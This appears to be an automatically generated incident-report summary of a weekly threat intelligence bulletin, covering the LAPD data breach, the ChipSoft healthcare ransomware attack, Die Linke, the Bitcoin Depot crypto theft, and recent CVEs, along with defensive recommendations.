Full Report
For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, […] The post 13th April – Threat Intelligence Report appeared first on Check Point Research.
Analysis Summary
# Incident Report: Multi-Victim Intelligence Roundup (April 13, 2026)
## Executive Summary
This intelligence report summarizes a series of high-impact cyber events including a massive data breach at the LAPD, a disruptive healthcare ransomware attack in the Netherlands, and a multi-million dollar cryptocurrency theft at Bitcoin Depot. These incidents demonstrate the continued targeting of public infrastructure and the high financial stakes of credential theft and ransomware.
## Incident Details
- **Discovery Date:** April 8 – April 13, 2026 (Reported)
- **Incident Date:** Late March – April 2026
- **Affected Organizations:** Los Angeles Police Department (LAPD), ChipSoft (Healthcare), Die Linke (Political Party), Bitcoin Depot (Crypto ATM)
- **Sector:** Government, Healthcare, Political, Finance/Crypto
- **Geography:** United States, Netherlands, Germany
## Timeline of Events
### Initial Access
- **Date/Time:** Circa late March 2026 (Die Linke); Unknown (LAPD/Bitcoin Depot)
- **Vector:** Credential theft (Bitcoin Depot); Vulnerability exploitation/Ransomware (ChipSoft/Die Linke)
- **Details:** Attackers gained access to digital asset settlement accounts for Bitcoin Depot and compromised digital storage systems for the L.A. City Attorney’s Office.
### Lateral Movement
- **Details:** In the ChipSoft incident, attackers moved through the provider's HiX platform, forcing the disconnection of multiple hospitals to prevent further spread.
### Data Exfiltration/Impact
- **LAPD:** 7.7 Terabytes of data (337,000+ files) including personnel records and internal affairs materials.
- **Bitcoin Depot:** Theft of over 50 BTC (approx. $3.6M) from company wallets.
- **Die Linke:** Shutdown of IT infrastructure; threatened leak of employee and party data.
- **ChipSoft:** Disruption of Dutch hospital operations and potential exposure of patient data.
### Detection & Response
- **Detection:** Multiple hospitals noted service disruptions; Bitcoin Depot detected unauthorized wallet transfers.
- **Response:** LAPD reported breach to authorities; ChipSoft disabled patient/provider services; Die Linke took IT infrastructure offline; Bitcoin Depot blocked further account access.
## Attack Methodology
- **Initial Access:** Credential theft (Digital Asset accounts); Phishing (for BITTER APT/Hack-for-hire).
- **Persistence:** Implementation of Android spyware (BITTER APT).
- **Lateral Movement:** Unauthorized access through integrated healthcare management platforms.
- **Collection:** Bulk scraping of digital storage systems (LAPD).
- **Exfiltration:** Direct transfer of cryptocurrency to attacker-controlled wallets.
- **Impact:** Service disruption (Healthcare/Political), financial loss (Crypto), and sensitive data exposure (Law Enforcement).
## Impact Assessment
- **Financial:** $3.6 Million+ in cryptocurrency (Bitcoin Depot).
- **Data Breach:** 7.7 TB of sensitive police records; potential healthcare records (ChipSoft); political membership/employee data.
- **Operational:** Massive disruption to Dutch hospital systems and German political infrastructure.
- **Reputational:** High-profile exposure of unredacted law enforcement personnel information.
## Indicators of Compromise
- **Network:** [h]xxps://research.checkpoint.com/wp-content/uploads/2026/04/Threat_Intelligence_News_2026-04-13.pdf
- **File:** Malicious PDF lures (targeting Russian oil/gas), Android spyware disguised as messaging apps.
- **Behavioral:** Ransomware.Wins.Qilin signatures; chaining of indirect prompt injection in AI components (GrafanaGhost).
## Response Actions
- **Containment:** Disabling of the HiX healthcare platform; shutting down party IT infrastructure (Die Linke).
- **Eradication:** Blocking compromised digital asset settlement accounts (Bitcoin Depot).
- **Recovery:** Development and release of patches for CVE-2026-1340 (Ivanti) and CVE-2026-39987 (Marimo).
## Lessons Learned
- **AI as a Vector:** The emergence of "AI Agent Traps" and "GrafanaGhost" highlights that AI integrations introduce new, silent exfiltration paths that standard WAFs may miss.
- **Supply Chain Vulnerability:** The ChipSoft incident highlights the single point of failure in centralized healthcare software platforms.
- **Rapid Exploitation:** Vulnerabilities like the Marimo RCE (CVE-2026-39987) are being weaponized within hours of disclosure.
## Recommendations
- **Asset Access Control:** Implement multi-factor authentication (MFA) and hardware security modules (HSM) for all cryptocurrency settlement and high-value financial accounts.
- **Patch Management:** Prioritize patching Ivanti Endpoint Manager Mobile (EPMM) due to active exploitation of CVE-2026-1340.
- **AI Security:** Audit internal AI deployments for prompt injection vulnerabilities and ensure image URL validation is robust.
- **Data Governance:** Review and encrypt sensitive digital storage systems (such as those used by the L.A. City Attorney) to mitigate the impact of a breach.